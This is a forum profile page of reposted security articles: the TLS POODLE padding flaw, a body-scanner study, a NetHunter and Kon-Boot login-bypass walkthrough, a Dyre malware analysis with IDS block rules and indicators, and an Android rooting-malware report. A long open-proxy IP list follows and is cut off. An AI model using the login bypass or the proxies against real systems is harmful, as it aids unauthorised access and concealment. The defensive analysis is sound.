-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
[h=3]The POODLE bites again (08 Dec 2014)[/h] October's POODLE attack affected CBC-mode cipher suites in SSLv3 due to SSLv3's under-specification of the contents of the CBC padding bytes. Since SSLv3 didn't say what the padding bytes should be, implementations couldn't check them and that opened SSLv3 up to an oracle attack. We're done pretty well at killing off SSLv3 in response to that. Chrome 39 (released Nov 18th) removed fallback to SSLv3 and Chrome 40 is scheduled to remove SSLv3 completely. Firefox 34 (released Dec 1st) has already removed SSLv3 support. We're removing SSLv3 in favour of TLS because TLS fully specifies the contents of the padding bytes and thus stops the attack. However, TLS's padding is a subset of SSLv3's padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn't check the padding bytes but that wouldn't cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections. This was noted by, at least, Brian Smith on the TLS list ([1][2]) and I was sufficiently cynical to assume that there were probably more instances of this than the old versions of NSS that Brian cited, and so wrote a scanner for the issue. Unfortunately, I found a number of major sites that had this problem. At least one of whom I had good enough contacts at to quickly find that they used an F5 device to terminate connections. I contacted F5 on October 21st and they started working on a fix. Yngve Pettersen also independently found this issue and contacted me about it around this time. F5 reported that some of the affected sites weren't customers of theirs, which meant that there was (at least) a second vendor with the same issue. After more digging, I found that some A10 devices also have this problem. I emailed a number of contacts at A10 on October 30th but sadly didn't get a reply from any of them. It wasn't until November 13th that I found the right person at A10 to deal with this. F5 have posted patches for their products and A10 should be releasing updates today. I'm not completely sure that I've found every affected vendor but, now that this issue is public, any other affected products should quickly come to light. (Citrix devices have an odd behaviour in this area in that they'll accept padding bytes that are all zeros, but not random padding. That's unexpected but I can't make an attack out of it.) Ivan Risti? has added a test for this issue to his excellent scanner at SSLLabs. Affected sites will have their grade set to F and will report “This server is vulnerable to the POODLE attack against TLS servers”. This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad. While RC4 is fundamentally broken and no implementation can save it, attacks against MtE-CBC ciphers have repeatedly been shown to be far more practical. Thankfully, TLS 1.2 support is about to hit 50% at the time of writing. Sursa: https://www.imperialviolet.org/2014/12/08/poodleagain.html
-
[h=1]Security Analysis of a Full-Body Scanner[/h] Full-body scanners (also known as “advanced imaging technology”) are used as the primary passenger screening mechanism in airports across the United States and many other countries. Despite their critical role in aviation security, these scanners have never been tested for effectiveness, privacy, or safety in a rigorous study that is independent of the manufacturers and government agency customers. This study documents the results of the first such independent evaluation of the Rapiscan Secure 1000, an X-ray backscatter machine that was deployed at TSA airport checkpoints between 2009 and 2013. In laboratory tests with a real machine, we were able to conceal guns, knives, and explosive simulants in such a way that they were not visible to the scanner operator. We also studied the cyberphysical security of the machine and were able to show how an attacker could subvert the operator console software so that it would be possible to conceal all types of contraband. Learn more: Press release Full research paper Image gallery Frequently asked questions (FAQ) [h=2]The Team[/h] The study is a collaboration between researchers at the University of California, San Diego, the University of Michigan, and Johns Hopkins University. To contact the entire team, email radsec-team@umich.edu. Keaton Mowery, Ph.D. student, University of California, San Diego Eric Wustrow, Ph.D. student, University of Michigan Tom Wypych, Ph.D. student, University of California, San Diego Corey Singleton, Radiation Safety Officer, University of California, San Diego Chris Comfort, Health Physicist, University of California, San Diego Eric Rescorla, Visiting Scholar, University of California, San Diego Stephen Checkoway, Assistant Research Professor, Johns Hopkins University J. Alex Halderman, Assistant Professor, University of Michigan Hovav Shacham, Associate Professor, University of California, San Diego Sursa: https://radsec.org/
-
Bypassing Windows and OSX Logins with NetHunter & Kon-boot DriveDroid support in Kali Linux NetHunter The Kali Linux NetHunter platform has many hidden features which we still haven’t brought to light. One of them is the DriveDroid application and patch set, which have been implemented in NetHunter since v1.0.2. This tool allows us to have NetHunter emulate a bootable ISO or USB, using images of our choosing. That’s right, you can use NetHunter as a boot device which holds a library of bootable ISOs and images…And so we begin: Installing Kali Linux Unattended using your Android Phone Yes, this is actually doable. We can easily generate a custom Kali ISO which has a self installing preseed file and have NetHunter boot it on a target machine. You load up DriveDroid, select the self installing ISO, plug in the USB cable, and reboot the target computer…..and all of a sudden, the Kali Linux install screen whizzes by, and starts installing itself with no user interaction… Bypassing Windows and OSX Logins Using NetHunter and Kon-Boot While the NetHunter HID attacks can provide us pre-programmed keyboard strokes which end up compromising the target machine – what happens if the target machine is turned off, or otherwise requires a login to access? The NetHunter HID attack would be useless at this point. Enter Kon-Boot, a must-have tool for anyone performing physical security assessments. As a quick reminder, Kon-Boot is a boot-kit which will silently boot and bypass the authentication process of Windows/OSX based operating systems, without overwriting your old passwords. We went ahead and purchased a commercial version of Kon-Boot, and tried using the provided Kon-Boot image file as our bootable USB payload. Lo and behold, when we plugged in our NetHunter device USB cable to a target computer, the Kon-Boot image booted and allowed us to bypass a Windows 8.1 login screen. Check out the video below to see it in action: Although this technology isn’t new, this implementation of it is pretty awesome, and complements the NetHunter arsenal of tools and features perfectly. Whats more, this has been battle tested in real-world onsite physical pentests we’ve performed and has proven to be extremely effective. Stay up to date with Kali Linux NetHunter Features As NetHunter development continues, we will try our hardest to make sure we keep you updated with all the existing and upcoming features of this awesome platform. To stay updated with our blogs and posts, make sure you follow us on twitter: Sursa: http://www.offensive-security.com/kali-linux/bypassing-windows-and-osx-logins-with-nethunter-kon-boot/
-
Dyre Attackers Shift Tactics December 8, 2014 By Ronnie Tokazowski On December 4th, several employees using PhishMe’s Reporter Button for Outlook reported new waves of Dyre phishing. The email appeared normal at first, but further analysis showed that the attackers have made a big shift in order to remain hidden. Here’s what the email looks like: Figure 1 — Dyre phishing email I’m not sure if this was on purpose, if the attacker’s script had some trouble, or if they were click happy, but the same user received several voice message emails. Figure 2 — Several emails reported with the PhishMe Reporter button Upon clicking the link, the user is presented with the option to download a zip file that contains an executable. Once the user visits the page, the background code also renders a counter that counts clicks. Figure 3 — GET request for the counter We can see that this counter has tracked around 10,000 clicks. These aren’t unique, as refreshing the page makes the counter increment by one. Figure 4 — Counter used by Dyre attackers The attackers are also changing the file names per download. Thankfully in our case, the hashes still match. Figure 5 — Hashes of files downloaded from Dyre campaign Once executed, the malware (in this case, Upatre) downloads an encoded payload which is Dyre. Upatre likes to use update-related user-agent strings when grabbing the payload. Figure 6 — Upatre downloading with the user agent string “realUpdate” Upatre also uses other user-agent strings such as “update” and “myupdate”. Looking for user-agent strings that contain these can help find potential infections in a network. Next, Dyre injects into the top-most svchost.exe. We saw this in early versions of Dyre as documented here (http://phishme.com/new-whitepaper-evolution-phish-phishing-delivery-mechanisms/) however it’s only recently that newer versions of Dyre have been capable of injecting into svchost.exe in Windows 7. By dumping the memory, running strings, and grepping for “:443” or “:4443” (ports Dyre uses for communication) we can see C2 IP’s, as well as a new addition. Figure 7 — IP’s dumped from memory with the addition of an i2p address While there is currently no response from this i2p node (Figure 8) there is successful i2p traffic going out from the infected system. (Figure 9) Figure 8 — Failed query for i2p address Figure 9 — Possible i2p traffic attempts For those who are unfamiliar with i2p, think of it as a more secure version of TOR, as things such as the true DNS destination are natively tunneled. I2p has aspects that are peer-to-peer, and every node is considered an exit node. In the case of Dyre, this could be to give the attackers a separate channel for communication, making it more difficult to analyze and detect. However, there are a few things we can do to cut them off. In the memory dump in Figure 7, we can see that the malware is configured to connect to an i2p domain via port 443. In Figure 8, we can see the actual DNS request going out. While we can’t specifically tell what’s going on in this case, by black holing i2p at the top-level domain we stop the propagation of the malware, as well as neuter any possible i2p traffic from a network. On the off chance that the attackers change domains to go over other ports for i2p, by configuring IDS systems to drop “GET /netdb/routerinfo”, we can cut off communications even further. (Figure 10) This applies to both HTTP and HTTPS protocols as well. Figure 10 — Portion of i2p traffic to block Here are the VirusTotal reports for the infections. Upatre: https://www.virustotal.com/en/file/2faf099c27af2c6f93601240e8e5525d6a66abd34a3431929da55982d0e728bc/analysis/ Dyre: https://www.virustotal.com/en/file/5a148aa655b2e175e67205c398736e2a4bfe318cdcc990c1e77da354d8d3db39/analysis/ Thanks to employees clicking the PhishMe Reporter button, we were able to quickly modify our Yara rule to match this latest strain. See the updated Yara rule here: Dyre_12_4 Sursa: Dyre Attackers Shift Tactics - PhishMe
-
New ‘Fakedebuggerd’ vulnerability in Android 4.x OS lets hackers root access By Vijay on December 8, 2014 · New ‘Fakedebuggerd’ vulnerability in all versions of Android OS upto lollipop, lets hackers root access Security Researchers at Chinese anti-virus company 360 have found out a new vulnerability in the Google’s Android operating system which is named as ‘Fakedebuggerd.’ This new vulnerability allows potential hackers to gain root access to install files and escalate privileges on the smartphones and tablets running on Android OS and run malicious codes at will. As per the 360 researchers, the Fakedebuggerd vulnerability enables a potential attacker to access an area that can be accessed only with system or root permissions. The vulnerability uses two known Android 4.x Privilege Escalation (PE) exploits, ‘FramaRoot’ and ‘TowelRoot’, to run code under root privileges and to install a root toolkit on the device. This allows the potential hacker to hide the code both from the Android user as well as the security solutions running on the devices. As such the hacker may inject any malicious App without users notice. Fakedebuggerd targets Android 4.x devices The vulnerability is of high risk as it gives serious privilege escalation to the handlers of malware and this is the first time the researchers have found out any Privilege Escalation vulnerabilities in Android 4.x. As said above, uses two exploits, TowelRoot’ and ‘FramaRoot’ together which means it has a higher rate of infection as well as higher chances of hiding itself from the AV engines aboard the users device. The Towelroot exploit is based on the futex() syscall vulnerability (CVE-2014-3153). This Linux vulnerability was discovered five months ago by Comex and affects almost all Android devices prior to Android 5.0 lollipop. The other exploit, Framaroot, is basically a rooting tool and based on several exploits for most Samsung, LG, Huawei, Asus and ZTE devices and more. The exploits which form the Framaroot are named after heroes of the popular JRR Tolkein triolgoy “The Lord of the Rings,” like Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. Almost all Android smartphones which are made by the above companies are able to execute Framaroot quite easily which makes Fakedebggerd very powerful vector. Modus Operandi Once the Fakedebuggerd vulnerability is exploited and the root toolkit is deployed on the infected device, malicious code to collects sensitive data like unique identifiers, device versions and network connectivity data. Additionally it will install unnecessary Apps like Flashlight and Calender without the users permission. The Fakedbuggerd is quite aggressive in its intent and uses extreme measures to keep them installed. Even if these Apps are removed by user using root privileges, the Fakedbuggerd reinstalls them automatically using the PE exploit. And as said above due the malware’s perfect hiding technique, simply deleting the suspicious apps wont work in this case. The Fakedbuggerd malware is a serious threat because of its ability to access root privileges and run malware laden codes on infected devices. In today’s world of convergence when the critical and confidential enterprise data and mobile phones are interconnected, Fakebuggerd can cause havoc unseen before. As of now no security solution or antivirus can detect this malware, therefore precaution is the best remedy against getting infected through this vulnerability. Stay away from third-party and unverified APKs and use the official Google Play Apps for download. Even if you have to download a APK, stick with trusted and well-reviewed app developers. Beware fake advertisements (malvertisements) and phishing links on all forms of communication – SMS, email and social networks. Resource : 360 Blog. Sursa: New 'Fakedebuggerd' vulnerability in Android 4.x OS lets hackers root access
-
[LIST=1]09-12-14 | Fast Proxy Server List (3678) Checked & filtered verified L1/L2/L3 HTTP Proxies (Timeout 3) 1.161.120.215:9064 1.161.141.187:9064 1.161.154.60:9064 1.164.170.193:8088 1.164.178.230:9064 1.165.107.142:9064 1.165.16.84:8088 1.168.10.162:9064 1.168.228.89:9064 1.168.8.187:9064 1.169.131.190:9064 1.170.121.72:9064 1.171.12.36:9064 1.171.13.30:9064 1.172.21.178:9064 1.172.22.49:9064 1.172.24.123:9064 1.172.29.1:9064 1.173.115.188:9064 1.174.0.72:9064 1.174.141.166:9064 1.174.242.11:9064 1.174.61.238:9064 1.175.42.191:9064 1.191.248.215:8585 1.22.120.108:9064 1.22.132.91:9064 1.23.168.194:9064 1.23.174.25:9064 1.23.189.95:9064 1.34.22.177:9064 1.93.8.169:3128 101.0.60.177:9064 101.1.16.123:3128 101.18.28.127:8585 101.226.12.223:80 101.251.102.122:3128 101.251.226.195:8888 101.251.238.123:8080 101.29.93.218:8585 101.63.156.218:9064 101.63.211.236:9064 101.63.214.28:9064 101.63.89.192:9064 103.16.157.141:80 103.16.177.140:9064 103.18.220.69:8080 103.240.96.40:9064 103.243.114.26:8080 103.248.248.121:8080 104.131.102.107:3128 104.131.81.106:3128 104.140.67.36:7808 104.140.67.36:8089 104.143.5.133:7808 104.143.5.133:8089 104.194.14.68:7808 104.194.14.68:8089 106.1.29.15:9064 106.104.66.93:9064 106.186.24.144:3128 106.218.252.130:9064 106.37.177.251:3128 106.83.238.65:8118 107.150.224.29:3128 107.150.224.29:80 107.150.224.29:8080 107.150.224.29:8180 107.170.254.23:3128 107.182.17.243:7808 107.182.17.243:8089 109.104.144.42:8080 109.236.88.144:25008 109.236.88.144:25012 109.60.249.107:3128 110.173.49.18:3128 110.232.83.38:8080 110.4.12.173:80 110.4.12.175:80 110.4.12.176:80 110.4.12.178:80 110.4.24.176:80 110.4.24.178:80 110.77.181.17:8080 110.77.233.229:3128 110.78.184.115:9064 111.1.3.38:8000 111.1.32.122:81 111.1.32.20:3128 111.1.32.20:8085 111.1.32.20:8086 111.1.32.20:8088 111.1.32.20:8888 111.1.32.21:81 111.1.32.21:86 111.1.32.22:81 111.1.32.22:86 111.1.32.23:85 111.1.32.24:3128 111.1.32.24:8088 111.1.32.24:81 111.1.32.28:81 111.1.32.29:81 111.1.32.29:86 111.1.36.10:80 111.1.36.133:80 111.1.36.137:80 111.1.36.138:80 111.1.36.139:80 111.1.36.140:80 111.1.36.163:80 111.1.36.164:80 111.1.36.166:80 111.1.36.167:80 111.1.36.2:80 111.1.36.21:80 111.1.36.21:82 111.1.36.21:83 111.1.36.21:84 111.1.36.21:85 111.1.36.22:80 111.1.36.23:80 111.1.36.23:81 111.1.36.23:86 111.1.36.25:80 111.1.36.25:81 111.1.36.25:82 111.1.36.25:83 111.1.36.25:86 111.1.36.26:80 111.1.36.26:81 111.1.36.26:83 111.1.36.26:84 111.1.36.26:85 111.1.36.3:80 111.1.36.4:80 111.1.36.5:80 111.1.36.6:80 111.1.36.9:80 111.1.60.163:80 111.1.61.74:80 111.10.100.155:8123 111.10.100.57:8123 111.10.100.70:8123 111.10.101.103:8123 111.10.101.219:8123 111.10.103.43:8123 111.10.112.162:8123 111.10.112.45:8123 111.10.112.71:8123 111.10.113.231:8123 111.10.114.51:8123 111.10.115.123:8123 111.10.116.206:8123 111.10.117.88:8123 111.10.118.5:8123 111.10.118.63:8123 111.10.12.3:8123 111.10.128.38:8123 111.10.136.187:8123 111.10.136.196:8123 111.10.136.35:8123 111.10.137.177:8123 111.10.138.32:8123 111.10.139.123:8123 111.10.139.185:8123 111.10.14.208:8123 111.10.144.80:8123 111.10.146.107:8123 111.10.146.17:8123 111.10.146.21:8123 111.10.146.251:8123 111.10.146.36:8123 111.10.147.217:8123 111.10.147.231:8123 111.10.147.93:8123 111.10.152.238:8123 111.10.152.81:8123 111.10.153.210:8123 111.10.154.15:8123 111.10.154.65:8123 111.10.155.66:8123 111.10.157.68:8123 111.10.158.216:8123 111.10.161.205:8123 111.10.164.61:8123 111.10.165.56:8123 111.10.165.7:8123 111.10.165.70:8123 111.10.166.194:8123 111.10.166.35:8123 111.10.167.161:8123 111.10.167.80:8123 111.10.168.37:8123 111.10.169.106:8123 111.10.187.140:8123 111.10.187.182:8123 111.10.194.50:8123 111.10.195.65:8123 111.10.198.179:8123 111.10.199.219:8123 111.10.28.197:8123 111.10.44.191:8123 111.10.45.139:8123 111.10.45.35:8123 111.10.48.29:8123 111.10.49.168:8123 111.10.49.255:8123 111.10.57.156:8123 111.10.58.38:8123 111.10.71.110:8123 111.10.79.146:8123 111.10.88.64:8123 111.10.89.182:8123 111.10.89.205:8123 111.10.90.214:8123 111.10.90.75:8123 111.10.98.239:8123 111.10.98.250:8123 111.10.98.76:8123 111.10.99.213:8123 111.119.192.34:8080 111.12.128.167:80 111.12.128.171:80 111.12.128.171:8060 111.12.128.171:8080 111.12.128.172:80 111.12.128.172:8089 111.13.109.51:80 111.13.109.52:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.13.55.3:22 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.174.225.44:8118 111.175.133.129:8585 111.184.102.113:9064 111.185.185.163:9064 111.198.216.86:8585 111.2.241.200:8123 111.206.81.248:80 111.240.110.183:9064 111.240.170.153:9064 111.240.66.51:9064 111.242.199.32:9064 111.242.2.160:9064 111.243.64.246:9064 111.248.178.236:9064 111.248.221.48:8088 111.248.76.82:9064 111.249.96.133:8088 111.250.169.115:9064 111.250.172.95:9064 111.250.189.8:9064 111.250.191.170:8088 111.251.111.191:9064 111.251.122.107:9064 111.251.222.136:9064 111.251.247.46:9064 111.252.135.133:9064 111.252.201.56:9064 111.252.30.229:9064 111.253.144.30:9064 111.253.64.177:9064 111.254.148.210:9064 111.254.161.22:9064 111.254.240.73:9064 111.255.250.160:9064 111.255.53.138:9064 111.40.194.48:80 111.7.129.140:80 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8086 111.7.129.150:8088 111.7.129.151:80 111.7.129.160:80 111.7.129.160:8087 111.7.129.162:80 111.7.129.162:8085 111.7.129.162:8086 111.76.115.67:8585 111.9.125.236:8123 111.9.139.43:8123 111.9.161.81:8123 111.9.174.195:8123 111.9.234.159:8123 111.9.85.132:8123 111.91.38.87:9064 111.91.56.133:9064 111.91.80.166:9064 111.92.17.196:9064 112.0.136.121:8123 112.0.136.123:8123 112.0.192.237:8123 112.0.221.58:8123 112.1.102.150:8123 112.1.172.223:8123 112.1.177.78:8123 112.104.123.239:9064 112.104.89.131:9064 112.105.228.19:9064 112.105.244.92:8088 112.105.84.58:8088 112.124.64.221:8000 112.15.111.27:8123 112.15.118.197:8123 112.15.22.132:8123 112.15.95.210:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.10.204:8123 112.18.152.224:8123 112.18.154.109:8123 112.18.154.6:8123 112.18.155.161:8123 112.18.161.130:8123 112.18.161.170:8123 112.18.161.199:8123 112.18.162.224:8123 112.18.163.239:8123 112.18.163.39:8123 112.18.164.133:8123 112.18.164.171:8123 112.18.164.251:8123 112.18.165.138:8123 112.18.165.226:8123 112.18.167.205:8123 112.18.168.23:8123 112.18.168.79:8123 112.18.170.117:8123 112.18.170.129:8123 112.18.170.176:8123 112.18.170.79:8123 112.18.171.120:8123 112.18.171.188:8123 112.18.172.182:8123 112.18.175.177:8123 112.18.176.53:8123 112.18.177.101:8123 112.18.177.64:8123 112.18.177.90:8123 112.18.178.185:8123 112.18.178.199:8123 112.18.178.85:8123 112.18.179.143:8123 112.18.179.48:8123 112.18.181.164:8123 112.18.184.131:8123 112.18.186.15:8123 112.18.186.240:8123 112.18.186.50:8123 112.18.187.17:8123 112.18.187.177:8123 112.18.187.95:8123 112.18.193.5:8123 112.18.193.60:8123 112.18.194.20:8123 112.18.194.55:8123 112.18.195.110:8123 112.18.196.58:8123 112.18.199.207:8123 112.18.21.131:8123 112.18.23.240:8123 112.18.4.206:8123 112.18.54.103:8123 112.18.54.169:8123 112.18.59.84:8123 112.18.65.35:8123 112.18.68.113:8123 112.18.68.174:8123 112.18.7.234:8123 112.18.71.62:8123 112.18.73.189:8123 112.18.79.148:8123 112.194.138.195:80 112.199.65.210:8080 112.2.204.171:8123 112.20.107.222:8123 112.20.110.61:8123 112.20.117.36:8123 112.20.138.112:8123 112.20.140.92:8123 112.20.140.94:8123 112.20.200.138:8123 112.20.200.71:8123 112.20.205.156:8123 112.20.96.82:18186 112.21.149.3:8123 112.21.176.219:8123 112.21.243.13:8123 112.21.249.213:8123 112.21.252.4:8123 112.22.150.151:8123 112.22.228.246:8123 112.22.228.94:8123 112.22.233.124:8123 112.22.237.65:8123 112.23.105.182:8123 112.23.109.44:8123 112.23.111.81:8123 112.23.61.127:8123 112.24.124.41:8123 112.24.126.197:8123 112.24.40.233:8123 112.24.67.134:8123 112.253.14.227:80 112.253.14.227:8080 112.3.104.101:8123 112.3.109.57:8123 112.3.135.187:8123 112.3.135.66:8123 112.3.165.55:8123 112.3.199.67:8123 112.3.28.29:8123 112.44.213.109:8123 112.44.215.167:8123 112.44.225.6:8123 112.44.226.94:8123 112.44.230.230:8123 112.44.232.43:8123 112.44.234.104:8123 112.44.239.5:8123 112.44.240.118:8123 112.44.240.159:8123 112.44.241.204:8123 112.44.246.7:8123 112.44.252.82:8123 112.45.177.132:8123 112.45.177.140:8123 112.45.182.117:8123 112.45.185.33:8123 112.5.16.50:80 112.85.70.2:80 113.105.224.77:80 113.105.224.79:80 113.107.57.76:3128 113.107.57.76:80 113.19.210.202:9064 113.19.99.92:9064 113.193.88.186:9064 113.21.73.32:9064 113.214.13.1:8000 113.250.101.69:8118 113.252.150.233:3128 113.4.246.213:8585 113.6.252.139:808 114.112.192.195:3128 114.112.91.97:90 114.219.107.201:8585 114.24.200.56:9064 114.24.4.184:9064 114.252.123.90:8118 114.254.147.169:3128 114.255.183.163:8080 114.255.183.164:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.73.178:9064 114.26.78.174:9064 114.27.108.36:9064 114.27.18.224:9064 114.36.136.167:9064 114.36.37.213:9064 114.36.59.90:9064 114.37.100.106:9064 114.37.124.18:9064 114.37.151.139:9064 114.37.186.106:8088 114.37.186.247:9064 114.37.77.174:9064 114.38.225.135:9064 114.38.233.221:9064 114.38.244.193:9064 114.38.83.224:9064 114.39.169.207:9064 114.39.244.150:9064 114.40.103.88:9064 114.40.108.12:9064 114.40.19.99:9064 114.40.63.192:9064 114.40.94.223:9064 114.42.168.111:9064 114.42.67.20:8088 114.43.121.11:8088 114.43.128.63:9064 114.43.17.108:9064 114.43.197.211:9064 114.44.41.69:9064 114.45.24.35:9064 114.45.32.205:9064 114.46.74.149:9064 114.47.173.196:8088 114.47.5.115:8088 114.79.171.175:9064 115.124.89.62:3128 115.154.191.110:3128 115.154.225.119:8585 115.187.48.246:9064 115.236.59.194:3128 115.242.178.128:9064 115.244.232.222:9064 115.248.217.178:3128 115.252.167.220:9064 115.28.137.189:3128 115.29.247.115:8888 115.68.53.117:8080 115.70.67.58:8080 115.71.233.88:8080 115.98.130.142:9064 115.99.0.9:9064 116.193.129.119:9064 116.202.34.78:9064 116.202.42.33:9064 116.203.177.183:9064 116.203.64.214:9064 116.228.55.217:8003 116.228.80.186:8080 116.231.121.89:8080 116.236.216.116:8080 116.248.51.34:8585 116.73.146.128:9064 116.75.104.48:9064 116.75.96.188:9064 117.121.242.8:10080 117.121.242.8:11095 117.121.242.8:13243 117.121.242.8:13669 117.121.242.8:14826 117.121.242.8:15275 117.121.242.8:16442 117.121.242.8:16515 117.121.242.8:21725 117.121.242.8:23685 117.121.242.8:24379 117.121.242.8:29037 117.121.242.8:29832 117.121.242.8:33719 117.121.242.8:33925 117.121.242.8:33942 117.121.242.8:33976 117.121.242.8:34034 117.121.242.8:35010 117.135.194.139:86 117.135.194.52:80 117.135.194.53:80 117.135.194.55:80 117.135.244.41:80 117.139.2.9:8123 117.139.28.8:8123 117.139.29.25:8123 117.139.29.35:8123 117.139.36.253:8123 117.139.38.167:8123 117.139.39.206:8123 117.139.39.78:8123 117.139.39.83:8123 117.139.42.180:8123 117.139.43.31:8123 117.139.43.68:8123 117.139.45.195:8123 117.139.46.101:8123 117.139.46.11:8123 117.139.46.21:8123 117.139.68.186:8123 117.139.71.252:8123 117.146.116.67:80 117.146.116.68:80 117.147.224.12:8123 117.147.225.158:8123 117.148.44.6:8123 117.149.213.144:8123 117.149.239.59:8123 117.162.106.219:8123 117.162.106.237:8123 117.162.106.28:8123 117.162.106.34:8123 117.162.110.208:8123 117.162.116.206:8123 117.162.124.233:8123 117.162.125.55:8123 117.162.128.193:8123 117.162.15.135:8123 117.162.165.37:8123 117.162.166.147:8123 117.162.168.147:8123 117.162.169.63:8123 117.162.170.209:8123 117.162.170.5:8123 117.162.171.152:8123 117.162.171.169:8123 117.162.172.159:8123 117.162.191.229:8123 117.162.196.252:8123 117.162.196.70:8123 117.162.203.164:8123 117.162.204.138:8123 117.162.205.172:8123 117.162.205.233:8123 117.162.206.104:8123 117.162.206.37:8123 117.162.208.140:8123 117.162.212.63:8123 117.162.217.52:8123 117.162.221.43:8123 117.162.224.200:8123 117.162.226.15:8123 117.162.227.159:8123 117.162.233.178:8123 117.162.236.40:8123 117.162.238.150:8123 117.162.238.153:8123 117.162.239.71:8123 117.162.242.204:8123 117.162.243.43:8123 117.162.246.136:8123 117.162.250.248:8123 117.162.251.101:8123 117.162.252.105:8123 117.162.35.103:8123 117.162.43.229:8123 117.162.63.90:8123 117.162.80.151:8123 117.162.81.220:8123 117.162.83.22:8123 117.162.84.21:8123 117.162.85.88:8123 117.162.86.88:8123 117.162.94.124:8123 117.162.94.173:8123 117.162.94.32:8123 117.162.95.48:8123 117.163.100.230:8123 117.163.102.79:8123 117.163.104.13:8123 117.163.109.234:8123 117.163.11.233:8123 117.163.115.162:8123 117.163.118.147:8123 117.163.119.60:8123 117.163.120.72:8123 117.163.126.188:8123 117.163.127.52:8123 117.163.128.151:8123 117.163.128.45:8123 117.163.13.179:8123 117.163.13.203:8123 117.163.131.138:8123 117.163.144.204:8123 117.163.145.76:8123 117.163.148.95:8123 117.163.151.106:8123 117.163.151.188:8123 117.163.151.57:8123 117.163.153.115:8123 117.163.153.27:8123 117.163.155.40:8123 117.163.156.182:8123 117.163.156.231:8123 117.163.156.42:8123 117.163.157.85:8123 117.163.158.13:8123 117.163.158.20:8123 117.163.158.208:8123 117.163.159.20:8123 117.163.165.0:8123 117.163.166.140:8123 117.163.168.30:8123 117.163.170.239:8123 117.163.170.249:8123 117.163.170.44:8123 117.163.175.66:8123 117.163.178.148:8123 117.163.181.171:8123 117.163.185.12:8123 117.163.186.113:8123 117.163.188.151:8123 117.163.190.98:8123 117.163.191.104:8123 117.163.194.127:8123 117.163.195.161:8123 117.163.195.236:8123 117.163.196.68:8123 117.163.203.180:8123 117.163.205.155:8123 117.163.21.142:8123 117.163.21.44:8123 117.163.211.188:8123 117.163.212.206:8123 117.163.218.249:8123 117.163.22.128:8123 117.163.22.73:8123 117.163.221.20:8123 117.163.224.151:8123 117.163.226.108:8123 117.163.227.127:8123 117.163.228.236:8123 117.163.23.129:8123 117.163.231.252:8123 117.163.233.48:8123 117.163.234.145:8123 117.163.234.203:8123 117.163.237.102:8123 117.163.238.139:8123 117.163.241.105:8123 117.163.245.114:8123 117.163.247.176:8123 117.163.26.128:8123 117.163.26.133:8123 117.163.29.142:8123 117.163.29.64:8123 117.163.30.104:8123 117.163.30.83:8123 117.163.31.250:8123 117.163.49.188:8123 117.163.49.84:8123 117.163.55.111:8123 117.163.64.235:8123 117.163.65.218:8123 117.163.66.144:8123 117.163.67.10:8123 117.163.67.213:8123 117.163.69.39:8123 117.163.75.62:8123 117.163.96.38:8123 117.163.96.97:8123 117.163.97.100:8123 117.163.97.27:8123 117.164.1.226:8123 117.164.10.196:8123 117.164.11.113:8123 117.164.11.180:8123 117.164.110.181:8123 117.164.114.117:8123 117.164.122.133:8123 117.164.128.102:8123 117.164.128.34:8123 117.164.129.149:8123 117.164.129.158:8123 117.164.130.111:8123 117.164.130.180:8123 117.164.131.242:8123 117.164.132.5:8123 117.164.133.251:8123 117.164.139.132:8123 117.164.14.193:8123 117.164.141.69:8123 117.164.142.79:8123 117.164.142.97:8123 117.164.143.86:8123 117.164.144.196:8123 117.164.147.206:8123 117.164.157.159:8123 117.164.158.113:8123 117.164.159.198:8123 117.164.159.206:8123 117.164.159.70:8123 117.164.16.133:8123 117.164.162.159:8123 117.164.163.36:8123 117.164.166.249:8123 117.164.170.74:8123 117.164.172.17:8123 117.164.173.197:8123 117.164.174.181:8123 117.164.18.134:8123 117.164.18.23:8123 117.164.18.44:8123 117.164.183.252:8123 117.164.184.42:8123 117.164.185.228:8123 117.164.195.117:8123 117.164.198.234:8123 117.164.199.155:8123 117.164.201.9:8123 117.164.205.210:8123 117.164.209.177:8123 117.164.210.101:8123 117.164.213.254:8123 117.164.215.234:8123 117.164.216.150:8123 117.164.216.184:8123 117.164.218.169:8123 117.164.218.82:8123 117.164.220.235:8123 117.164.222.136:8123 117.164.232.71:8123 117.164.234.102:8123 117.164.235.158:8123 117.164.236.30:8123 117.164.240.224:8123 117.164.250.222:8123 117.164.250.51:8123 117.164.26.72:8123 117.164.28.208:8123 117.164.29.11:8123 117.164.31.111:8123 117.164.31.28:8123 117.164.38.11:8123 117.164.46.110:8123 117.164.46.127:8123 117.164.47.170:8123 117.164.51.69:8123 117.164.53.130:8123 117.164.53.47:8123 117.164.55.9:8123 117.164.59.96:8123 117.164.60.10:8123 117.164.61.218:8123 117.164.76.249:8123 117.164.8.7:8123 117.164.96.248:8123 117.164.98.247:8123 117.165.10.38:8123 117.165.101.119:8123 117.165.103.209:8123 117.165.11.240:8123 117.165.11.251:8123 117.165.110.33:8123 117.165.12.240:8123 117.165.121.181:8123 117.165.121.83:8123 117.165.122.25:8123 117.165.129.104:8123 117.165.129.110:8123 117.165.137.184:8123 117.165.140.129:8123 117.165.141.225:8123 117.165.146.252:8123 117.165.148.214:8123 117.165.149.34:8123 117.165.155.156:8123 117.165.157.79:8123 117.165.16.109:8123 117.165.162.234:8123 117.165.164.223:8123 117.165.167.86:8123 117.165.170.101:8123 117.165.171.77:8123 117.165.172.216:8123 117.165.177.74:8123 117.165.182.142:8123 117.165.187.168:8123 117.165.19.197:8123 117.165.192.36:8123 117.165.206.114:8123 117.165.210.207:8123 117.165.225.204:8123 117.165.228.175:8123 